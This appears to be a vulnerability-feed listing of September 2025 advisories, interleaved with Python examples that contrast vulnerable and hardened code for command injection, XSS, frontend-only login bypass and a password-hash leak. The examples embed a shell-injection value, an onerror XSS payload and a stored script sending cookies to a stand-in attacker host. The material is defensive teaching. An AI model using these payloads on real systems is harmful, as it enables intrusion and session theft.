
16820 matches found

Tenable Nessus
added 2025/09/26 12:00 a.m. | 2 views

File Browser Unauthenticated Access

File Browser is an open-source web-based file manager that allows users to manage files on a server through a web interface. If the File Browser instance is accessible without authentication, it can lead to unauthorized access to sensitive files and directories on the server. No source data...

AI score: 6.8
Exploits: 0 | References: 2

Vulnrichment
added 2025/09/25 5:32 p.m. | 3 views

CVE-2025-10959 Wavlink NU516U1 firewall.cgi sub_401778 command injection

A vulnerability has been found in Wavlink NU516U1 M16U1V240425. The affected element is the function sub_401778 of the file /cgi-bin/firewall.cgi. Such manipulation of the argument dmz_flag leads to command injection. The attack can be executed remotely. The exploit has been disclosed to the public...

CVSS: 6.5 | AI score: 6.6 | EPSS: 0.0661
Exploits: 1 | References: 5

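The pattern behind the Wavlink entry (an HTTP parameter interpolated into a shell command), shown as an added example that is not the vendor's firmware code. Only the parameter name dmz_flag is taken from the advisory; the echo-based stand-in for the privileged firewall command and the 0/1 allowlist are assumptions made so the code runs offline.

```python
"""Command injection via a CGI parameter: the vulnerable form and a hardened one.

Added example; not Wavlink's firmware. The parameter name dmz_flag comes from
the advisory. The echo-based stand-in for the privileged firewall command and
the 0/1 allowlist are assumptions so that this runs offline.
"""
import re
import subprocess
from urllib.parse import parse_qs

# Assumption: the real handler runs a privileged tool such as iptables.
# `echo` stands in so the effect of injected text is visible in stdout.
BASE_CMD = "echo applying-dmz-rule"


def _dmz_flag(query_string: str) -> str:
    return parse_qs(query_string, keep_blank_values=True).get("dmz_flag", [""])[0]


def vulnerable_handler(query_string: str) -> tuple[int, str]:
    """Interpolates the raw parameter into a string that /bin/sh then parses.

    A value of "1; echo INJECTED" ends the intended command at ';' and runs
    a second, attacker-chosen command with the CGI's privileges.
    """
    cmd = f"{BASE_CMD} dmz_flag={_dmz_flag(query_string)}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout
    return 200, out


_DMZ_FLAG_RE = re.compile(r"[01]")  # the flag is a boolean switch: allowlist it


def hardened_handler(query_string: str) -> tuple[int, str]:
    """Allowlist the value, then execute with argv (no shell).

    Two independent layers: anything but "0"/"1" is refused with 400, and the
    argv form means a bad value could only ever be one literal argument,
    never a second command, because no shell tokenises it.
    """
    flag = _dmz_flag(query_string)
    if not _DMZ_FLAG_RE.fullmatch(flag):
        return 400, "rejected dmz_flag value"
    argv = BASE_CMD.split() + [f"dmz_flag={flag}"]
    out = subprocess.run(argv, capture_output=True, text=True, check=True).stdout
    return 200, out


def argv_keeps_value_literal(value: str) -> str:
    """The argv layer alone: shell metacharacters in `value` stay literal."""
    argv = BASE_CMD.split() + [f"dmz_flag={value}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "dmz_flag=1;%20echo%20INJECTED"   # decodes to "1; echo INJECTED"
    print("vulnerable:", vulnerable_handler(payload)[1].splitlines())
    print("hardened:  ", hardened_handler(payload))
    print("argv only: ", argv_keeps_value_literal("1; echo INJECTED").strip())
```

The allowlist is the primary control; the argv form is defence in depth for the day someone widens the allowlist to a free-text field.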
RedhatCVE
added 2025/09/25 2:53 a.m. | 5 views

CVE-2025-9495

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

CVSS: 8.7 | AI score: 7 | EPSS: 0.00292
Exploits: 0 | References: 1

CNNVD
added 2025/09/25 12:00 a.m. | 3 views

IBM Watson Studio Cross-Site Scripting Vulnerability

IBM Watson Studio is a data science and machine learning platform from IBM, integrated into Cloud Pak for Data, for building, training and deploying AI models. A cross-site scripting vulnerability exists in IBM Watson Studio versions 4.0 through 5.2.0 that stems from not adequately filtering user...

CVSS: 5.4 | AI score: 6.2 | EPSS: 0.00162
Exploits: 0 | References: 1

NVD
added 2025/09/24 6:15 p.m. | 12 views

CVE-2025-20327

A vulnerability in the web UI of Cisco IOS Software could allow an authenticated, remote attacker with low privileges to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a...

CVSS: 7.7 | EPSS: 0.00354
Exploits: 0 | References: 1

NVD
added 2025/09/24 6:15 p.m. | 6 views

CVE-2025-20240

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

CVSS: 6.1 | EPSS: 0.00272
Exploits: 0 | References: 1

Cvelist
added 2025/09/24 5:14 p.m. | 6 views

CVE-2025-20240

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

CVSS: 6.1 | EPSS: 0.00272
Exploits: 0 | References: 1

Vulnrichment
added 2025/09/24 5:14 p.m. | 1 view

CVE-2025-20240

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

CVSS: 6.1 | AI score: 5.2 | EPSS: 0.00272
Exploits: 0 | References: 1

CVE
added 2025/09/24 5:14 p.m. | 24 views

CVE-2025-20240

Cisco IOS XE Software Web UI/Web Authentication vulnerability (CVE-2025-20240) is a reflected XSS due to improper sanitization of user input. An unauthenticated, remote attacker can bait a user to click a malicious link, potentially executing a reflected XSS and stealing cookies on the affected d...

CVSS: 6.1 | AI score: 5.2 | EPSS: 0.00272
Exploits: 0 | References: 1

Cvelist
added 2025/09/24 5:11 p.m. | 7 views

CVE-2025-20327

A vulnerability in the web UI of Cisco IOS Software could allow an authenticated, remote attacker with low privileges to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a...

CVSS: 7.7 | EPSS: 0.00354
Exploits: 0 | References: 1

Vulnrichment
added 2025/09/24 5:11 p.m. | 1 view

CVE-2025-20327

A vulnerability in the web UI of Cisco IOS Software could allow an authenticated, remote attacker with low privileges to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a...

CVSS: 7.7 | AI score: 6.3 | EPSS: 0.00354
Exploits: 0 | References: 1

Cisco
added 2025/09/24 4:00 p.m. | 11 views

Cisco IOS XE Software Web Authentication Reflected Cross-Site Scripting Vulnerability

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack on an affected device. This vulnerability is due to improper sanitization of user-supplied input. An attacker could...

CVSS: 6.1 | AI score: 5.7 | EPSS: 0.00272
Exploits: 0 | References: 1

RedhatCVE
added 2025/09/24 12:28 a.m. | 10 views

CVE-2025-57433

The 2wcom IP-4c 2.15.5 device's web interface includes an information disclosure vulnerability. By sending a crafted POST request to a specific endpoint /cwi/ajax_request/get_data.php, an authenticated attacker even with a low-privileged account like guest can retrieve the hashed passwords for the...

CVSS: 6.5 | AI score: 6.2 | EPSS: 0.00337
Exploits: 1 | References: 1

IBM Security Bulletins
added 2025/09/23 8:54 p.m. | 9 views

Security Bulletin: TS4500 Tape Library/Diamondback Tape Library addresses security vulnerability CVE-2025-36088

Summary: The web GUI did not sufficiently sanitize user input in certain dialogs, allowing HTML or JavaScript to be stored and later displayed to other users. Malicious code would only execute if a user opened the affected event entry. The issue has been resolved by adding proper input sanitizatio...

CVSS: 5.4 | AI score: 6 | EPSS: 0.00166
Exploits: 0 | Affected software: 2

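The two XSS shapes on this page (reflected, as in the Cisco Web Authentication entries; stored, as in the IBM tape-library bulletin and the Watson Studio entry) share one root cause: user input written into HTML without escaping. The following is an added example, not Cisco's or IBM's code. The login-error banner that echoes a request parameter and the event log that displays stored entries are assumed page shapes standing in for the advisories' web UIs; the detection helper parses the rendered markup rather than grepping it, so escaped text is correctly not flagged.

```python
"""Reflected and stored XSS from unescaped output, beside the escaped form.

Added example; not Cisco's or IBM's code. The login-error banner that echoes
a request parameter and the event log that displays stored entries are
assumed page shapes standing in for the advisories' web UIs.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs


def _msg(query_string: str) -> str:
    return parse_qs(query_string, keep_blank_values=True).get("msg", [""])[0]


def render_login_error_vulnerable(query_string: str) -> str:
    """Reflected XSS: the parameter lands in the markup exactly as sent."""
    return f'<div class="error">{_msg(query_string)}</div>'


def render_login_error_safe(query_string: str) -> str:
    """html.escape(quote=True) turns < > & " ' into entities, so the value can
    only ever be text. A template engine with auto-escaping is the better
    default; this is the minimum for a text node."""
    return f'<div class="error">{html.escape(_msg(query_string), quote=True)}</div>'


EVENT_LOG: list[str] = []   # constructed stand-in for server-side storage


def store_event(text: str) -> None:
    """Stored XSS differs only in timing: the text is saved raw and the
    danger arises whenever a later viewer's browser renders it."""
    EVENT_LOG.append(text)


def render_events_vulnerable() -> str:
    return "<ul>" + "".join(f"<li>{e}</li>" for e in EVENT_LOG) + "</ul>"


def render_events_safe() -> str:
    return "<ul>" + "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in EVENT_LOG) + "</ul>"


class _ActiveContentFinder(HTMLParser):
    """Flags markup a browser would execute: a <script> element or any
    on* event-handler attribute on any element."""

    def __init__(self) -> None:
        super().__init__()
        self.active = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.active = True


def has_active_content(markup: str) -> bool:
    """Tokenises the rendered HTML the way a browser would; the check is on
    parsed tags, not substrings, so entity-escaped text does not count."""
    finder = _ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.active


if __name__ == "__main__":
    q = "msg=Login%20failed%3Cimg%20src%3Dx%20onerror%3Dalert(document.cookie)%3E"
    for render in (render_login_error_vulnerable, render_login_error_safe):
        out = render(q)
        print(has_active_content(out), out)
    # constructed stored payload; attacker.invalid is a reserved, non-resolving name
    store_event("<script>fetch('//attacker.invalid/?c='+document.cookie)</script>")
    print(has_active_content(render_events_vulnerable()), has_active_content(render_events_safe()))
```

Escaping at output time, in the context the value lands in, is the control; filtering on input (what the Watson Studio entry describes as inadequate) is at best a second layer, because the same stored string may later be rendered in an HTML text node, an attribute, or a script block, each with different escaping rules.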
NVD
added 2025/09/23 2:15 a.m. | 5 views

CVE-2025-9495

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

CVSS: 8.7 | EPSS: 0.00292
Exploits: 0 | References: 1

Vulnrichment
added 2025/09/23 1:16 a.m. | 1 view

CVE-2025-9495 Viessmann Vitogate 300 Authentication Bypass

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

CVSS: 8.7 | AI score: 6.6 | EPSS: 0.00292
Exploits: 0 | References: 1

Cvelist
added 2025/09/23 1:16 a.m. | 6 views

CVE-2025-9495 Viessmann Vitogate 300 Authentication Bypass

The Vitogate 300 web interface fails to enforce proper server-side authentication and relies on frontend-based authentication controls. This allows an attacker to simply modify HTML elements in the browser’s developer tools to bypass login restrictions. By removing specific UI elements, an attack...

CVSS: 8.7 | EPSS: 0.00292
Exploits: 0 | References: 1

CVE
added 2025/09/23 1:16 a.m. | 13 views

CVE-2025-9495

CVE-2025-9495 - Vitogate 300 Authentication Bypass : The Vitogate 300 web interface relies on frontend-based authentication controls and does not enforce proper server-side authentication. An attacker can modify HTML elements via browser developer tools to bypass login restrictions and reveal the...

CVSS: 8.7 | AI score: 6.6 | EPSS: 0.00292
Exploits: 0 | References: 1

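What "frontend-based authentication controls" means in practice, and what the server-side fix looks like, as an added example that is not Viessmann's code. The Vitogate 300 entries say only that hiding UI elements stood in for a server-side check and that removing those elements in the developer tools bypasses login; the endpoints, page markup, credential and config data below are assumptions and constructed samples, and requests are dispatched in-process so the example runs offline.

```python
"""Frontend-only authentication versus server-side enforcement.

Added example; not Viessmann's code. The advisory says only that the Vitogate
300 UI relied on frontend controls that could be removed in the browser's
developer tools. The endpoints, page markup, credential and config data below
are assumptions/constructed samples. Requests are dispatched in-process so
the example runs offline.
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


# Constructed samples standing in for protected device settings and the
# admin credential (a real device would store a password hash).
DEVICE_CONFIG = {"modbus_gateway": "192.0.2.10", "admin_user": "admin"}
CREDENTIALS = {"admin": "correct-horse-battery"}

LOGIN_PAGE = """<form id="login"><input name="password"></form>
<div id="panel" style="display:none">configuration panel</div>
<script>
// Frontend-only gate: script compares the typed password, then unhides
// #panel, which fetches /api/config. Deleting style="display:none" in the
// developer tools skips the comparison; the server is never consulted.
</script>"""


def vulnerable_app(req: Request):
    """The data endpoint answers anyone; hiding the panel was the only 'check'."""
    if req.path == "/":
        return 200, LOGIN_PAGE
    if req.path == "/api/config":
        return 200, DEVICE_CONFIG
    return 404, ""


SESSIONS: set[str] = set()   # server-side session store


def hardened_app(req: Request):
    """Authentication happens on the server and is bound to a random session
    token; the page markup is now irrelevant to who may read the config."""
    if req.path == "/":
        return 200, LOGIN_PAGE
    if req.method == "POST" and req.path == "/api/login":
        stored = CREDENTIALS.get(req.form.get("user", ""))
        # An unknown user must fail closed rather than comparing "" against an
        # empty submitted password, which compare_digest would accept.
        if stored is not None and secrets.compare_digest(stored, req.form.get("password", "")):
            token = secrets.token_urlsafe(32)
            SESSIONS.add(token)
            return 200, {"set_cookie": f"session={token}"}
        return 401, ""
    if req.path == "/api/config":
        if req.cookies.get("session") not in SESSIONS:
            return 401, ""
        return 200, DEVICE_CONFIG
    return 404, ""


def bypass_attempt(app):
    """The advisory's technique reduced to its network effect: request the
    data endpoint with no session. Removing the hidden element makes the
    browser do exactly this; curl does it without a browser at all."""
    return app(Request("GET", "/api/config"))


def login_then_fetch(app, user: str, password: str):
    """The legitimate path: log in, then present the issued session cookie."""
    status, body = app(Request("POST", "/api/login", form={"user": user, "password": password}))
    if status != 200:
        return status, body
    token = body["set_cookie"].split("=", 1)[1]
    return app(Request("GET", "/api/config", cookies={"session": token}))


if __name__ == "__main__":
    print("vulnerable, no session:", bypass_attempt(vulnerable_app))
    print("hardened, no session:  ", bypass_attempt(hardened_app))
    print("hardened, after login: ", login_then_fetch(hardened_app, "admin", "correct-horse-battery"))
```

The test for this class of bug is the same on any device: replay each request the "logged-in" page makes, minus the cookie or token, and see whether the data still comes back.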
CVE
added 2025/09/22 12:00 a.m. | 14 views

CVE-2025-57433

The CVE-2025-57433 entry concerns the 2wcom IP-4c device (version 2.15.5). A vulnerability in the web interface allows information disclosure via a crafted POST to /cwi/ajax_request/get_data.php. An authenticated user, even with low privileges (e.g., guest), can retrieve hashed passwords for admi...

CVSS: 6.5 | AI score: 5.8 | EPSS: 0.00337
Exploits: 1 | References: 2 | Affected software: 1

Cvelist
added 2025/09/22 12:00 a.m. | 7 views

CVE-2025-57433

The 2wcom IP-4c 2.15.5 device's web interface includes an information disclosure vulnerability. By sending a crafted POST request to a specific endpoint /cwi/ajax_request/get_data.php, an authenticated attacker even with a low-privileged account like guest can retrieve the hashed passwords for the...

EPSS: 0.00337
Exploits: 1 | References: 2

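The 2wcom entries describe the other half of the access-control problem: the caller is authenticated, but the data endpoint neither checks the caller's role nor limits which columns it serializes, so a guest session receives password hashes it can crack offline. The following is an added example, not 2wcom's code; the request shape, role table and user records are assumptions and constructed samples, and the hash values are placeholder strings.

```python
"""Authorization and field filtering on an authenticated data endpoint.

Added example; not 2wcom's code. The advisory says a crafted POST to an
authenticated data endpoint returned password hashes to a low-privileged
(guest) user. The request shape, role table and user records below are
assumptions/constructed samples; the hashes are placeholder strings.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    user: str
    role: str   # "admin" or "guest"


# Constructed user table. A real device would hold salted digests here; the
# values are placeholders, not real hashes.
USERS = {
    "admin": {"role": "admin", "password_hash": "$6$placeholder$ADMINHASH", "email": "admin@example.com"},
    "guest": {"role": "guest", "password_hash": "$6$placeholder$GUESTHASH", "email": ""},
}


def get_data_vulnerable(session: Session, request: dict):
    """Authenticated, but not authorised: any logged-in session that names
    the users table gets every column, password hashes included."""
    if request.get("table") == "users":
        return 200, USERS
    return 400, {"error": "unknown table"}


# Per-table, per-role allowlist of columns a client may read. password_hash
# is on no list: the server compares against it; no client needs it.
READABLE_COLUMNS = {
    "users": {"admin": {"role", "email"}, "guest": set()},
}


def get_data_hardened(session: Session, request: dict):
    """Checks the caller's role against the table, then projects only the
    allowed columns, so an authorisation slip cannot leak the hash column."""
    table = request.get("table")
    if table not in READABLE_COLUMNS:
        return 400, {"error": "unknown table"}
    allowed = READABLE_COLUMNS[table].get(session.role, set())
    if not allowed:
        return 403, {"error": "forbidden"}
    rows = USERS   # the only table in this example
    return 200, {name: {k: v for k, v in row.items() if k in allowed} for name, row in rows.items()}


def leaks_hashes(body) -> bool:
    """Detection helper: walks a JSON-like response for a password_hash key
    at any depth, the check a test or a proxy rule would apply to responses."""
    if isinstance(body, dict):
        return any(k == "password_hash" or leaks_hashes(v) for k, v in body.items())
    if isinstance(body, list):
        return any(leaks_hashes(v) for v in body)
    return False


if __name__ == "__main__":
    guest = Session("guest", "guest")
    status, body = get_data_vulnerable(guest, {"table": "users"})
    print("vulnerable, guest:", status, "leaks hashes:", leaks_hashes(body))
    print("hardened, guest:  ", get_data_hardened(guest, {"table": "users"}))
    print("hardened, admin:  ", get_data_hardened(Session("admin", "admin"), {"table": "users"}))
```

Role checks and column projection are separate controls on purpose: the role check stops a guest reading the table at all, and the projection means that even the admin view, or a future role added carelessly, never carries the hash column out of the server.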